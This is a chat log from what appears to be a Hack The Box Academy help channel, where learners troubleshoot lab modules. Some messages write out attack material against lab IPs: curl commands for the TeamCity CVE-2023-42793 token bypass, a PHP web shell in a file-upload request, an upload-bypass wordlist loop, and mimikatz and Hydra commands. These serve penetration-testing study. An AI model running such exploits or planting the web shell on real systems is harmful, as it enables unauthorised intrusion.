#modules

1 messages · Page 447 of 1

sharp notch
#

try them all out see how they work

#

i think theres a way to see it more verbose with descriptions too not sure atm though

#

that powershell course took me a while to get through

indigo mirage
#

I just got it

#

Thanks for your support

waxen totem
#

Please don't share answers for module questions here~

fickle sparrow
#

got a question regarding the module windows fundamentals NTFS vs Shar permissions I'm using remmina to log into the server, but I can't ping with my terminal or pwnbox terminal... wtf

#

obvs i'm connected to the vpn and when I try to use the pwnbox the connection on my rdp is drop

#

@tidal cradle master, do you have any tips ?

fathom pendant
#

get-help get-childitem sometimes i find myself also reading the associated powershell documentation

fathom pendant
#

it looks like, for whatever reason, there was a connection error

fickle sparrow
#

he is not random to me lol

#

ik lol

#

i mean, i want to verify if this is an issue from the htb server itself

fathom pendant
#

not all labs respond to pings, typically windows machines don't respond to pings

fickle sparrow
#

i changed to UDP to TCP and nothig

#

oh okok

fathom pendant
#

if you can rdp → then it's up and running

fickle sparrow
#

then how can i do the module then? if when i connected to the pwnbox the RDP connection is drop

fathom pendant
#

not sure with remmina but i know with xfreerdp there's the /timeout: option

fickle sparrow
#

i'm supposed to smbclient, but I can't do it on my own shell. So, I tried on the pwnbox and that shit is dropping the connection

fathom pendant
#

are you running the vpn on your own machine AND using the pwnbox at the same time?

#

if the answer is yes: don't do that

fickle sparrow
#

okok

#

so basically just RDP and then use the pwnbox, correct?

fathom pendant
#

no

#

either:

  • use your own vm
  • use the pwnbox
    one or the other
fickle sparrow
#

this happen when i tried to connect to the pwnbox, the rdp is drop

fathom pendant
#

sigh

#

do you want the short answer or the longer/technical answer as to why this is occuring

fickle sparrow
#

i can't even connect to the smb, so technical please, becuase i dont understand jack

fathom pendant
#

short answer: the vpn assigns the same internal IP address
longer/technical: because the vpn statically assigns the internal IP you encounter what's known as "network collisions" which is to say that the packets don't know where to go back to because it's trying to go to two devices that are assigned the same IP

#

in short: don't use the pwnbox AND your own vm at the same time

fickle sparrow
#

ok but the vpn is not even connected

fathom pendant
#

otherwise this is what to expect. Connection errors

fathom pendant
fickle sparrow
#

i just log out to test if the pwnbox is able to smb

#

but i am getting the connection time out as well

#

i bet is a server issue

fathom pendant
#

well if changing the vpn region and resetting the target doesn't work. reach out to support

compact patrolBOT
fickle sparrow
#

okok thanks

summer arrow
#

Hello, I am a bit stuck in the Advanced XSS and CSRF Exploitation Skill Assessment. I am moderator, tried some things for data exfiltration but not working. Any nudge on this skill assessment?

hardy sundial
blissful elm
#

in LOGIN BRUTE FORCIGN > Custom wordlists , htb give code hydra -L usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
to use for solving the question but did the intentionally give teh wrong format?

#

coz valid ans is Short answer: The example as written is incomplete/misleading. It will trigger “Invalid target definition!” because the target/module part is in the wrong order.

What’s wrong in that line

It places IP -s PORT before the module, which uses Hydra’s generic target syntax, but then also supplies the http-post-form triple separately — mixing two different styles.

For form attacks, Hydra expects either:

Module-prefixed URL style: http-post-form://HOST:PORT followed by the "PATH:BODY:COND" triple, or

Generic host with -m specifying the triple (less common for web forms).

#

i waas doing the old modules question for revision , now everything was easy and i noticed that many code/script format given was wrong thats why i was spending too much time and days when i first doing the modules

gloomy geyser
#

I am also stuck here. I am not what I am missing beside that the fact I know that SQL can be executed to get the DB but not able to load file.

hexed forge
#

Did anyone elses search for the last question in the Skills Assement for Web Fuzzing take like an hour and half?

jagged schooner
#

Whoops got a little crosseyed, but I agree that the response both show 200 OK with different body message. So from my understanding, the url encoded file name input is being taken at face value instead of being parsed? Is there an option to fix this?

sacred ermine
#

anyone can give a little hint where to look in the skills assessment for using crackmapexec module? stuck on the third question

#

got the local admin on mssql server, but cannot move to the next part

sharp notch
#

htb giving some problems with wireshark any tips? i set to all users can capture packets but still no avail

white beacon
sharp notch
#

ive done all this and it doesn't show interface after i press 'yes'

sacred ermine
sharp notch
#

didnt do anything aborted because gui error

#

upgrading currently

sacred ermine
sacred ermine
sacred ermine
gloomy geyser
#

You must use Burpsuite

green cypress
#

In Kerberos Attacks - Constrained Delegation Overview & Attacking from Windows, it never states why when we see the use of HTTP as the altservice when it is Constrained Delegation of www/WS01

and I couldn't find any resources, like it just states use HTTP, but why and how are we expected to know that since its www/WS01 we use altservice:http in the Rubeus query

sacred ermine
#

nope

#

dm if you need help, to avoid spoiling here

dry falcon
#

Hi guys, query on the Skills Assessment of Windows Privilege escalation PT 1.

Question 2:

“Find the password for the ldapadmin account somewhere on the system”.

i tried to run RoguePotato.exe , PrintSpoofer but give something [-] Named pipe error . how to do it ? any guide plz

quartz latch
#

first module y r my pings n nmap not returning

green cypress
quartz latch
#

currently attempting code two

#

im connected to the starting point

#

o

green cypress
quartz latch
#

openVPN

#

ill try connecting to play machhines instead of starting point probably the issue Kappa

#

embarrassing 🙈

fathom pendant
hardy sundial
#

hey bro, do you got this challenge

covert light
#

Module: Intro to C2 Operations with Sliver
Section: Probing the Surface
Question: Assess further the web application and submit the name of the database user

Any hint regarding this question? Thank you!

brave field
brave field
#

Same here. Don't really understand the underlying problem here. However, when I ran the 2.7.1 version, it gave me this error:2025-08-24T04:19:26.9273949-07:00|ERROR|Error during main ldap query:PagedQuery - Caught unrecoverable exception: The server does not support the control. The control is critical. (0).

terse bloom
little trench
#

hello everyone i am doing
Intro to Academy's Purple Modules

Page 6
Usage Example: JetBrains TeamCity CVE-2023-42793 i put those 2 commands curl -X POST \

-H "Content-Type: application/xml"
-d '<?xml version="1.0" encoding="UTF-8" standalone="yes"?><token name="RPC2" creationTime="2024-11-13T06:55:16.176-06:00" value="eyJ0eXAiOiAiVENWMiJ9.dWRYeEc2dFM3X2VuRV9yZTJCbFpOcUloNWVV.Y2M0ODIzZGEtMTUyNy00NmY3LThiNzgtM2E0M2YzMmY0YjQ4"/>'
http://10.129.232.10/app/rest/users/id:1/tokens/RPC2 as well as curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.dWRYeEc2dFM3X2VuRV9yZTJCbFpOcUloNWVV.Y2M0ODIzZGEtMTUyNy00NmY3LThiNzgtM2E0M2YzMmY0YjQ4" -X POST "http://10.129.232.10/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true" and they work but then i put this command curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.dWRYeEc2dFM3X2VuRV9yZTJCbFpOcUloNWVV.Y2M0ODIzZGEtMTUyNy00NmY3LThiNzgtM2E0M2YzMmY0YjQ4" "http://10.129.232.10/admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties" and it shows this Could not authenticate with provided token
To login manually go to "/login.html" page can someone explain why this happens to me please;

autumn pilot
#

You skipped the step of obtaining the valid token

little trench
#

The valid token from what i am reading is given to you in this command curl -X POST http://<Target_IP>/app/rest/users/id:1/tokens/RPC2

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><token name="RPC2" creationTime="2024-11-13T06:55:16.176-06:00" value="eyJ0eXAiOiAiVENWMiJ9.dWRYeEc2dFM3X2VuRV9yZTJCbFpOcUloNWVV.Y2M0ODIzZGEtMTUyNy00NmY3LThiNzgtM2E0M2YzMmY0YjQ4"/> but when i put this command it shows an error this is the only step to optain the valid token only

median gale
autumn pilot
gloomy geyser
# median gale Did you get it ?

Yes. The trick is to use burpsuite. The SQL execute will then allow you to capture the flag. Let me know if you really need to know where the flag is? Else I try not to give spoiler

neat charm
#

Attacking AI - Application and System
Model Deployment Tampering

Were you able to get this working. For me in module #Model Deployment Tampering. i am able to get the GET request to /RCE endpoint like shown in the module but to get the RCE working. I portforwarded a remote port and later ran simple bash RCE to the port but i was never able to get the shell. Were you successful to get it finally working?

opal shuttle
#

i am doing AD skill assessment 1

#

i am not able to get shell

#

what should i do

median gale
#

Tried read system files with load file but didnt work

dim ridge
#

I just finished the Documentation & Reporting Module but I'm finding despite making a report template with findings etc for WriteHat it isn't showing the findings in the final report...
Will probably use SysReptor for Attacking Enterprise Networks module but I wanted to get a final report for D&R. Anyone get the same issue?

gloomy geyser
median gale
#

If you did not use the repeater of burpsuite what did you do with it?

#

just review the requests going through ?

gloomy geyser
gloomy geyser
median gale
gloomy geyser
rocky estuary
#

nvm its working now under UAC section

median gale
median gale
#

The only table show tables show is items which only returns 1 like when you query it to select * from users;

gloomy geyser
gloomy geyser
austere hound
#

Never mind. Solve the non working powershell.exe problem with a work-around solution.

gloomy geyser
#

@median gale The process to enumerate the different tables and columns will take some time. You can try slowly to see. And you will be able to find the Users table. There are other tables as well, which wasted a lot of my time to enumerate

median gale
gloomy geyser
jagged schooner
#

I disable url encoding the payload.

How would I resolve the following parsing issues / could someone help me understanding what is happening under the hood? I manage to upload shell.php/.png, but I can't seem to access /profile_images/shell.php/.png via curl, browser , or burpsuite. I also tried /profile_images/shell.php.png and url encoding but no luck.

Are there flags in curl that I should enable?

I'm now on File Upload Attacks: Whitelist Filters

median gale
gloomy geyser
cobalt lava
#

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

In getting started / public exploits this is the correct exploit to use right to complete the question? got a bit stuck so any help is appreciated!

rustic sage
#

Hey! Is here anyone expert hacker? If yes, kindly dm me asap. It's urgent

jagged schooner
cobalt lava
#

metasploit is the easy way out ig 😭

acoustic owl
rain hawk
#

Hello everyone,
I am solving the Codetwo machine and I found the user flag but the when I want to take the root
I want to make changes and edit the. Npbackup.conf ,it crash and can't edit and then ... Error
Anyone? Help plz

jagged schooner
#

But I find how they coded the parsing behavior of the server weird or is it just me. I'm just a FastAPI dev 😅

rustic sage
waxen totem
waxen totem
surreal beacon
#

Hey can i ask about the Live engagement in private if anyone has done it? (Shells and payloads)

weak vapor
#

hello everyone

dry falcon
#

Hi guys, query on the Skills Assessment of Windows Privilege escalation PT 1.

Question 2:

“Find the password for the ldapadmin account somewhere on the system”.

i tried to run RoguePotato.exe , PrintSpoofer but give something [-] Named pipe error . how to do it ?

i ask chatgpt so long tell me :
⚡ What this means for you

KB3199986 / KB3200970 (and later cumulative updates) kill Rotten/JuicyPotato.

Later 2020+ updates kill PrintSpoofer & GodPotato on Win10 20H2/Server 2019.

That’s why all your attempts end in “pipe timeout” or “failed to impersonate.”

what to do any guide plz hugthebox
thanks in advance

surreal beacon
dry falcon
gray yacht
weak vapor
#

how do I find all listening interfaces on the target system?

#

I used ss -tulwn

#

but the answer was incorrect

#

of course I filtered the output first

scarlet dock
#

hi guys
somebody concluded the Password Cracking module ?

covert light
lament wedge
#

Hi, did you solved it?

paper sluice
#

Wassup

#

HTB changed my name.. crazy 🤪

swift dove
fathom pendant
paper sluice
#

Oou.. gotcha 💪

lament wedge
cosmic radish
#

Hello do we still have access to the modules we complete even when we don't have a subscription any more ?

acoustic owl
cosmic radish
#

awesome thank you !

gaunt roost
#

Hello,
I hope you're going well.

has anyone ever encountered the following error "1312,PSSessionStateBroken' when using invoke-command?

Context: I'm on a child dc and I'm trying to invoke commands on the parent dc. I've already forged an Inter-realm tgt and an ST for HOST and HTTP.

Thanks a lot.

hot dirge
#

Hello

gaunt roost
#

Hello

weak vapor
#

everyone saying hello, no one saying bye

weak kindle
#

Anyone completed the NTLM Attack module, I'm stuck and need some help? Please reply to this message and I will DM you

gray yacht
# scarlet dock hi guys somebody concluded the Password Cracking module ?

You need to stop sending me DMs, unless I tell you in this channel that you can send me one. I currently do not have the time to help you with that SA. I suggest searching this channel for related questions and if you aren't getting any assistance in here, review the module material. If your issue is pivoting related, get your Google on, or hold off on this skills assessment until you have gone through enough of the pivoting module to get through the Password Attacks SA.

scarlet dock
fathom pendant
unique stream
#

how can i unlock the general?

acoustic owl
unique stream
nocturne sun
#

Guys is it possible to earn cubes?

acoustic owl
#

You can buy them. Sometimes there are competitions on HTB's social media channels, and you can win Cubes during the season.

orchid scaffold
#

hello why is this why doesnt this password work?

north sage
#

I have entered this

USER anonymous[Ctrl+V][Enter][Enter]
PASS anything[Ctrl+V][Enter][Enter]
PASV[Ctrl+V][Enter][Enter]

at the bottom right in Pownbox and then into the terminal.
It still doesn’t work.
What do I have to do?

dim ridge
orchid scaffold
#

also

dim ridge
#

you got the link for the page of the module?

orchid scaffold
#

can i send here tho?

dim ridge
#

i thought you could, i always get asked for that when im raising questions, so people know what bit you're stuck on

brave field
orchid scaffold
#

nvm it worked now

north sage
#

I have entered this

USER anonymous[Ctrl+V][Enter][Enter]
PASS anything[Ctrl+V][Enter][Enter]
PASV[Ctrl+V][Enter][Enter]

at the bottom right in Pownbox and then into the terminal.
It still doesn’t work.
What do I have to do? ❤️

north sage
dry falcon
#

to paste

#

@north sage

jagged fractal
#

can someone help me with this error? I followed the steps specified by the module exactly

dry falcon
# jagged fractal can someone help me with this error? I followed the steps specified by the modul...

It is somewhere in this 2 hours 10 minute video
https://www.youtube.com/watch?v=3bvKLj0akMM

00:00 - Intro
02:10 - Using wget to recursively download files off an annonymous FTP Server
06:00 - Attempting to execute the Java Thick Client, then switching to Java version 8 and trying again
08:00 - Seeing the Thick Client makes some DNS Requests, make the DNS Request resolve and attempt to intercept with Burp
11:00 - BurpSuite failed us, us...

▶ Play video
north sage
jagged fractal
heady sapphire
#

Hello ! The command netexec smb <ip/24> -u Administrator -d . -H <hash_value> is the same with the command netexec smb <ip/24> -u Administrator -H <hash_value> —local-auth?

nimble condor
#

i don't understand why using target with nmap or gobuster on pwnbox works

#

but in kali linux it wont work

#

any idea why ?

north sage
# dry falcon try `ctrl + shift + v`

I found the problem.
I entered the commands after the bash prompt returned, not while nc <target id> 21 was running.
Then the variant [Ctrl+V][Enter][Enter] worked during the process as well.

gray yacht
heady sapphire
lone solar
#

hey how do you get access to #general am i a dunce

lone solar
winter vector
#

Bumping this since I'm running into similar troubles in another lab. There's also a bunch of typos in the entire AI Red Teamer path. The material is great, don't get me wrong, but it looks a bit rushed

surreal gorge
#

Hi guys! Im new on the server! Anyways.
I`m stuck at the File Upload Attacks - Whitelist Filters module.
i used this code to make a wordlist:
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
for ext in 'php' '.php2' '.php3' '.php4' '.php5' '.php6' '.php7' '.phps' '.phps' '.pht' '.phtm' '.phtml' '.pgif' '.shtml' '.htaccess' '.phar' '.inc'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt

also I added jpeg, png.

done
done

then did a burp intruder to try and upload the php shell using the fordlist for the name:
POST /upload.php HTTP/1.1
Host: 83.136.253.59:50496
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------131615687336890501682755748198
Content-Length: 109713
Origin: http://83.136.253.59:50496
Connection: keep-alive
Referer: http://83.136.253.59:50496/
Priority: u=0
-----------------------------131615687336890501682755748198
Content-Disposition: form-data; name="uploadFile"; filename=""
Content-Type: image/jpeg
<?php system($_GET['cmd']);?>
-----------------------------131615687336890501682755748198--
now i would sort by length and look at the response to see if i can find something like "file uploaded".
but since i cant find it (because it didnt work but anyways)
i use this to maybe see it:
ffuf -w wordlist.txt:FUZZ -u http://83.136.253.59:50496/profile_images/FUZZ?cmd=id
but all i get back are the 403 forbidden phps ones

quiet trout
#

Working Cracking Encrypted/Protected Archives

https://academy.hackthebox.com/module/147/section/1323

We go over how to tell if a zip or archive is password protected using file and a few other scenarios.

I'm curious if the file archive.zip cmd will ever mislead you and tell you it detects an archive but not that its password protected? (And if it did would it fail to extract, or leave you with a 0 byte file or something?)

#

and more broadly speaking whether other archive formats gzi, tar, .tar.gz will do this?

lone pumice
#

hey

cloud urchin
#

@lone pumice Please don't post flags

lone pumice
#

hell nah

#

that's not the flag, bro

cloud urchin
#

Best to say the module section and question you're on. If it's not accepting it, you're not inputting the flag correctly or it's a flag for another question.

lone pumice
#

solved, thx

gray leaf
#

I'm working on the Module Intro to C2 Operations with Sliver, in the Assumed Breach chapter. There is only one question, but for the last 2 days RDP crashes on the target system within seconds of making a successful connection. Once it crashes, the port is no longer open and it's impossible to reconnect.

I have switched VPN servers several times, switched from UDP to TCP vpn and back again with no luck. Is there something I'm missing?

quiet trout
#

did you try connecting with your rdp client (xfree?) with udp?

#

er tcp?, i think thats often suggested

#

whichever the opposite of the default is.

#

@gray leaf ^

gray leaf
#

I don't think xfree supports UDP? I did try switching VPN from one to the other though

quiet trout
summer arrow
#

Hello, I am a bit stuck in the Advanced XSS and CSRF Exploitation Skill Assessment. I am moderator, tried some things for data exfiltration but not working. Any nudge on this skill assessment?

cloud urchin
shut wraith
#

Anyone can help me with the CME module

#

nvm

quiet trout
shut wraith
quiet trout
#

i thought i had done that, apparently not. going to keep messing with it

#

thx bud

shut wraith
#

Hey question

#

Have u done the CME module?

#

On the assessment -- I bruted all RID usernames but the supposed correct password does not work on any of them

quiet trout
#

ah i was being silly its simple the fucking hints man...

#

no im no where near the CME modules yet >_<

#

holy kiss my ass the machine is gonna die and i cant extend it and im on my last 15 minutes or whatever

#

wow just got lucky it all came together

fathom pendant
quiet trout
#

thx @fathom pendant I thought the hint was telling me i needed to find some type of complicated bypass. i had everything i needed.

fathom pendant
quiet trout
#

and yes i ended up using pasta, or a dish like it.

fathom pendant
#

And the bypass is actually really simple

#

Just gotta launch it from the cmd terminal youre impersonating

quiet trout
#

Yeah, i already had it i just needed to keep my contexts straight i didnt realize yeah esxactly

fathom pendant
#

Instead of from the start menu

quiet trout
#

i guess there was diff groups

fathom pendant
#

At least for the one I used

quiet trout
#

yup same here

shut wraith
#

DId anyone do the CME module can help me

#

CME Skills Assessment

  • Cannot access the interns DB (returns nothing) (could it be empty)
  • Cannot enable xp_cmdshell (does not work)
  • Sysadmin returns "0"
steady mural
#

Im working on the Hacking WordPress Module. Im at the part where they give you the admin user and pass so to you can put a reverse shell on. For whatever reason I can't login to the account. It just never loads. Any hints?

shut wraith
#

Or maybe the password is wrong

#

Or box is broke

#

Or u should refresh to check connectivity

steady mural
steady mural
fathom pendant
#

when you get got by your own security

alpine mural
#

Hi! Someone in Model Deployment Tampering from the module "Atacking AI - Application and System"?
I follow the steps of the exercise and I get this error:

  "code": 500,
  "type": "InvalidWorkflowException",
  "message": "Failed to parse yaml."
}```
ebon minnow
#

im very weak with ffuf, are there more resources apart from the ffuf module in the academy?

cloud urchin
plain summit
#
Attacking Common Applications Application Discovery & Enumeration

When trying to run the -iL scopeList flag with nmap I get this error:

Failed to open input file scopeList for reading: No such file or directory (2)
cloud urchin
#

The problem is in the error message. It can't find the file you're asking it to use a file (scopeList), that file is not present in your curreng working directory.

plain summit
cloud urchin
#

i don't believe it

plain summit
#

Can I dm?

cloud urchin
#

show the results of ls

plain summit
#

Maybe I misspelled something?

#

But I can't send images

cloud urchin
#

just copy the terminal output

#

linux is case sensitive as well

plain summit
formal tartan
#

Hi guys, did anyone recently solve Pass the Certificate section Assessment of Password Attacks module ?

quiet halo
#

I was redoing the nmap module and saw the -sn flag. It's disables port scanning, I looked on nmap documentation and it says "The -sn option sends an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request by default" isn't that a port scan?

clever gull
#

Hi all ! This is the first community I've joined in hopes to learn and grow into the penetration testing role i so desire.

Am I in the right place lads/ladies/misc

cloud urchin
compact patrolBOT
clever gull
cloud urchin
#

No

stone crag
#

Hi guys, Can I ask some question about Bug Bounty Hunter's Module

cloud urchin
#

yes this is the channel for modules

stone crag
#

I'm trying Attack Tuning Case5 in sqlmap's module, But when I got the flag and send, it return error

#

Can I show my payload about use sqlmap? or not

#

I'm trying to use
--dbms=mysql --batch -D testdb -T flag5 --dump --no-cast --level=5 --risk=3
and it was get a flag looks like: HTB{70X_XXXXXXXXXXXXX_17}
but when I send it to Module
It return error

proven plinth
#

sudo nmap -sn 10.0.2.8

quiet halo
#

try it again with the --packet-trace, nmap shows TCP SYN and TCP ACK

#

no shut why wiresharke doesnt sh ow

fathom pendant
quiet halo
#

just do one host

fathom pendant
#

-sn is designed for running against subnets i.e. ip/24

little trench
quiet halo
#

oh yeah buty I mean just for this example

fathom pendant
#

ye

#

i am just meaning for the purposes of what -sn does

quiet halo
#

my question was was does it saysn -sn dosnet do port scan then it says it sends TCP SYN packet to port 443, a TCP ACK packet to port 80

fathom pendant
#

yes, but that's not necessarily a port scan

#

a port scan is checking a whole bunch of ports at once rather than specific ports

proven plinth
#

Without sudo, packet trace showed it connecting to ports 80 and 443. But with sudo, its ARP and DNS

#

It matches what I saw in Wireshark

#

So somehow -sn works properly only if you sudo?

little trench
late fable
proven plinth
#

Its behavior is consistent with what's written in the man page

fathom pendant
proven plinth
fathom pendant
#

it can't create raw packets without sudo (or unless you do the setcap magic)

proven plinth
#

Learned something new today. I always sudo it so I never noticed

fathom pendant
#

ye

#

sudo allows for nmap to do some lower level stuff

proven plinth
blazing tulip
#

I was doing the module "Attacking Web Applications with FFUF", and seems something is wrong with the system, I got the URL which displays: "You don't have access!' but it says my answer is wrong

#

How is it possible?

blazing tulip
#

Damn

#

I need treats

blazing tulip
quiet halo
#

sudo nmap -sn 10.129.207.8 --packet-trace --reason

stone crag
noble sand
#

Hi everyone,

I’m stuck on Introduction to NoSQL Injection, Skills Assessment II (https://academy.hackthebox.com/module/171/section/1692). I’ve only been able to find a valid user b****, but I can’t make any progress beyond that.

Every request I try just returns “Error: Missing 'username' parameter” or “missing password” or "missing token", and I can’t seem to get past it.

I’ve read all the messages about this exercise on the forum and Discord, and I see everyone mentioning to pay attention to the (.). I understand that this refers to using dot notation ||(.$regex)|| instead of brackets ||([$regex])||, but I still can’t figure out a way to advance.

I’ve been stuck for over a day now, tried multiple approaches, and it’s really frustrating. Any guidance or hints on how to approach this would be greatly appreciated.

Thanks in advance!

drowsy sierra
#

Very first module. Coming from THM. I've started a Pwnbox but can't see my target IP. In THM it usually populates in the question. Where is it here?

#

I've worked it out.

fathom pendant
#

(i was already typing out before you worked it out lol)

drowsy sierra
#

Yep, thanks. lol

dull solar
#

For the 2nd, remove the text.

#

For the 3rd try again, ip a | grep 1500

#

1st, maybe try the full path?

dapper silo
#

1: what would be the full "path"? ps /bash? 2: 6.11? 3: i cant type the | in the terminal emulator, nor can i paste it, paste anything for that matter

#

could it be that the emulator and everything in it got updated, but the "correct" answers are still that of the old emulator? cuz the next chapter all my seemingly right answers are also wrong

amber heath
#

Hey anyone can assist with the Advanced Command obfuscation question?

#

I bypass the blacklists but i dont get the answer printed

fathom pendant
#

for pasting into terminals: the keyboard shortcut is ctrl+shift+v

#

also please refrain from screenshots that may or may not contain answers

dapper silo
#

thanks

short orbit
#

hey i'm a little confused with something in the SQLmap labs (https://academy.hackthebox.com/module/58/section/517) :
for the first question i used these flags : ||sqlmap 'link' --data='id=1' --batch --dbs --tables --dump||
but the dump didn't work, however when i do : ||sqlmap 'link' --data='id=1' --batch --dump||
it work flawlessly why doest the ||--dbs|| and ||--tables|| breaks everything ?

prisma wing
#

Hi all, still stuck on this 'https://academy.hackthebox.com/module/80/section/781'. How would I enumerate the admin ID without manually going through them all? I've tried intruder but all ids from 0-300 give me the same response. I've tried ffuf, which is also not working. Can someone help please? the guide says to go back a check the brute force methods but none of the methods teach us on how to enumerate the id, only the usernames or passwords. I've managed to get username but unable to brute force the password. Any ideas please?

fathom pendant
#

this isn't a hacker for hire server;

prisma wing
mellow mist
#

I got it, its from earlier. If any mod is reading this, Im not a big fan of this approach

fathom pendant
#

/feedback goes directly to the htb staff slack

mellow mist
#

I guess, in general im a big fan, but this module is very intensive, and takes a long time. It feels mweh to have to look back for a password that does not really add anything to the current section

#

Thanks @fathom pendant

fathom pendant
mellow mist
#

Okay it gets worse, the password does not work... while this was the answer in a previous section

viscid timber
#

Hello, im doing Pentest in a nutshell - Win system enum... but for god im not able to do the "What is the exact OS Version that WinPEAS delivers?". But if I use like (Get-CimInstance Win32_OperatingSystem).Version in ps i got version but its still bad. Wheres my mistake?

fathom pendant
mellow mist
fathom pendant
#

some of the others use forend

mellow mist
#

yes forend seems to work though. I think I can atleast finish the module now

#

Thanks again, and sorry it has beign a long day of study

fathom pendant
mellow mist
#

ye i know, it don't wanna spoil it here.. but i have it in all lowercase

iron oriole
#

Did anyone finish Rogue Actions from new AI Red Teaming path?

noble sand
acoustic owl
iron oriole
#

@winter vector was you able to finish the AI lab?

fathom pendant
iron oriole
acoustic owl
fathom pendant
loud moon
#

Hello i am new, what did i miss

iron oriole
gray yacht
fathom pendant
fathom pendant
iron oriole
#

Anyway, if anyone has a problem with Rogue Actions in new AI Red Teaming module let me know pls

civic inlet
#

Will we ever see a quantum computing module on htb? that would be cool

acoustic owl
#

Use /feedback to send your feedback to the right place.

formal jungle
#

https://academy.hackthebox.com/module/195/section/2182

this module has been stressing me for awhile now, please help
Last question

" + 0 What is the name of the function that returns the string inside the cpp file? (Format:
FunctionName()).
Java_com_example_myapplication_MainActivity_stringFromJNI() "
[10:14 AM]
thats the answer but it still says incorrect

fathom pendant
#

@formal jungle don't try and @ everyone, that ping doesn't work for you anyway. just have some patience

terse bloom
#

Hello, Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIndeitifer -eq $sid} -Verbose in AD (ACL) module has been hanging for 20 minutes now even though in the module it says it takes 1-2 minutes to run. Is this an issue?

late fable
fathom pendant
teal arrow
#

About to finish the cpts path, I heard someone say that doing the crackmapexec module will help on the cpts. What do you guys think?

gray yacht
winter vector
acoustic owl
iron oriole
willow lintel
#

Do i miss something?

#

i've done :
.\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

#

but never find john's .kirbi

terse bloom
terse bloom
late fable
gray yacht
hot dirge
#

Hello

ocean flower
#

in Active Directory Enumeration & Attacks
Internal Password Spraying - from Windows
is this normal ???

gray yacht
ocean flower
#

oh ok it's worked thx

muted gale
#

@fathom pendant

#

how can i activate my self ?

fathom pendant
#

? you mean link your account

muted gale
#

say's contact with an administator

fathom pendant
#

dm me

iron oriole
dusky geode
#

Hi, I’m doing the Advanced Deserialization Attack with JSON lab but I can’t get the exploit to work. I followed the steps and everything seems fine in debug, but even the notepad.exe PoC doesn’t trigger locally. Has anyone else had this issue and is willing to help me ?

minor mica
#

Module - Navigation- What is the index number of the "sudoers" file in the "/etc" directory? I am connected via open VPN. When I am doing the practice and pulling it up its telling me my answer is incorrect.

teal arrow
#

How do you guys know when to use the command prompt over powershell or vice versa, excuse my ignorance, but it seems that a lot of these commands overlap but some execute differently in both. I see them used interchangeably through active directory but there are so many commands I just can't understand the pattern.

quiet trout
#

https://academy.hackthebox.com/module/147/section/1326

Attacking Active Directory and NTDS.dit

I'm having trouble enumerating the domain correctly.

I've tried: nmap scripts (all the usual suspects), sending an invalid domain to kerbrute and seeing if it would "correct" me with the right domain on error, rpcclient, smbclient, dig the DC for various records (axfr, NS, PTR, etc)

uncertain what im not doing right

#

except guessing (i even tried inlanefreight.local and .htb as a guess with no dice) . I dont think guessing is the lesson they're trying to teach here (beyond educated guessing with valid context from the usernames and such)

#

nvm i guess i wasnt using the right script

median gale
blazing mango
#

I'll have to try it out

quiet trout
#

Someone got a sec to help me compare some net user output? im curious why im seeing groups for net localgroup, but when i do net user <username> the local groups section is blank?

#

nevermind net localgroup shows both user and computer groups i guess?

normal field
#

Hi guys, I'm working on 'Intro To Network Traffic Analysis: Interrogating Network Traffic' where I need to analyze pcap file. What will be the best way to open up this pcap file? Should I download Wireshark in my Windows 11? I'm watching a YouTube set up his Kali Linux through Remote Desktop Connection but not sure what's the best route for this lab and moving forward!

gray yacht
quiet trout
#

you might be able to get away with just installing wireshark on windows at the moment but you will absolutely need a kali vm or similar as you get deeper into security.

formal tartan
pseudo kiln
#

so is the android application pentesting path complete now ?

#

also interestingly enough it seems like a hybrid cert covering both pentesting and defensive android work, not sure what to think about that 🤔

full wagon
#

Sorry for posting here, but cannot post in general. Is there any channel for discussing retired HTB machines?

acoustic owl
normal field
hasty mauve
#

Does the release of the skill path for android pentesting means there won't be a job role path for it?

#

because I was excited for an android pentester job role path tbh

deep raptor
#

Hi, who is doing the ctf?

rustic sage
#

hi anyone who finished PMKID Attack section of Attacking WPA/WPA2 Wi-Fi Networks i have 1 simple question

nova forum
#

@storm elk Pls can you help me with the LLM Output Attacks Skills Assessment ? I am in admin bot and trying to get some SQLi or code injection to work in order to find the flag...

cloud urchin
#

Best to also include the module/section/password you're on

opal cape
#

hey is it a known issue in the AEN that when we do the ping sweep on DC01 (172.16.9.3)? no host comes back alive for me. I checked the module and there is supposed to be at least one live host so that we try the SSH keys we find in the Department Share directory against that live host.

cloud urchin
#

You may need to ping sweep twice to ensure the ARP tables are populated

opal cape
#

it worked by the way

cloud urchin
cloud urchin
#

general is fine, maybe #red-team too, but you'll need to verify your account by following the instructions in #welcome before you can access either channel

opal cape
#

also im trying to download the ssh keys in evil-winrm but getting download failed. Im thinking its because the space between Departmen Shares: download "C:\Department Shares\IT\Private\Networking\ssmallsadm-id_rsa" /tmp/ssmallsadm-id_rsa

#

how do i bypass this ?

cloud urchin
#

Try single quotes or just navigate to the directory first and avoid using the download function with the full path

quiet halo
#

How do you guys take notes? I’m over here copying almost the documentation for a single nmap flag. It takes make like 1 day to finish a single section of a module bc of the amount notes im taking

cloud urchin
#

I usually note an overview, the command, what the parameters/sytax of the commands do, a screenshot of it working, and any gotchas.

gray leaf
# gray leaf I'm working on the Module Intro to C2 Operations with Sliver, in the Assumed Bre...

